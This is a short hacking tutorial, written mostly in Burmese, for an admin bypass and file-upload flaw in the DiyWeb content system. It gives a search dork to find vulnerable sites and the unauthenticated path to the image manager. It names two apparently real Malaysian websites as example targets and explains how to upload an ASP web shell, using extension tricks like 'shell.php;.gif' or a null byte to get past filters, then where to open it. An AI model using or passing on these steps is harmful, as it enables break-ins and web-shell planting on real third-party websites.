DiyWeb Admin Bypass and Remote file/shell Upload exploit

Dork : "Power by DiyWeb"

            inurl:/template.asp?menuid=

Poc : diyweb/menu/admin/image_manager.asp

မစခင္ တစ္ခုေတာ့ ေျပာခ်င္ပါတယ္ ဒီနည္းက မေလးရွားဆုိဒ္ အမ်ားစု ေပါက္တာမ်ားပါတယ္..
(သားသား တုိ ့အၾကိဳက္ေပ့ါxx) ၾကဳံတုန္းထပ္ေျပာခ်င္ပါေသးဘိ။ မေလး၇ွားနဲ ့ အင္ဒုိ ဆုိဒ္တစ္ခ်ုဳိ ့က
SPAW File Manager - File Upload Vulnerability နည္းမွာေပါက္ေနပါတယ္.. ဆုိဒ္မွာအဲ့နည္းကိုတင္ေပးထားပါေသးတယ္ web hacking တညး္
၀င္လွန္ေလွာလုိက္ပါ.. ေတာ္ပါျပီ
ေလေဖာတာရပ္ျပီး.. ပာက္နည္းကိုျပန္စမယ္..

Dork သုံးျပီးထြက္လာတဲ့ ဆုိဒ္ေတြကို ေအာက္ကလုိ လင့္ အစားထုိးေပးပါ..
 http://www.website.com/diyweb/menu/admin/image_manager.asp
 အဲ့လုိ မ်ဳိးကိုေျပာတာပါ..

ဥပမာ လင့္ေလး ႏွစ္ခုနဲ ့စၾကပါမယ္..
http://www.ultraracing.com.my/diyweb/menu/admin/image_manager.asp
http://www.otgmalaysia.com/diyweb/menu/admin/image_manager.asp

အဲ့မွာ တစ္ခုေျပာခ်င္ပါတယ္.. shell တင္မယ္ဆုိရင္ asp shell တင္ပါ.. php ေတြအလုပ္မလုပ္ပါဘူး..
shell.asp ဖုိင္ တင္လုိ ့အဆင္မေျပဘူးဆုိရင္ shell.php;.gif လုိ ့သာေျပာငး္တင္လုိက္ပါ.. null ခံလည္းရပါေသးတယ္..

တင္ျပီးသားဖုိင္ကို ဘယ္မွာ ျပန္ၾကည့္မလဲဆုိေတာ့..

http://www.ultraracing.com.my/images/

မွာ ျပန္လည္သြား၇ွာရမွာျဖစ္ပါတယ္.. မ၇ွာခ်င္ရင္ေတာ့

http://www.ultraracing.com.my/images/shell.asp

အဲ့လုိ ၇ွာနုိင္ပါတယ္..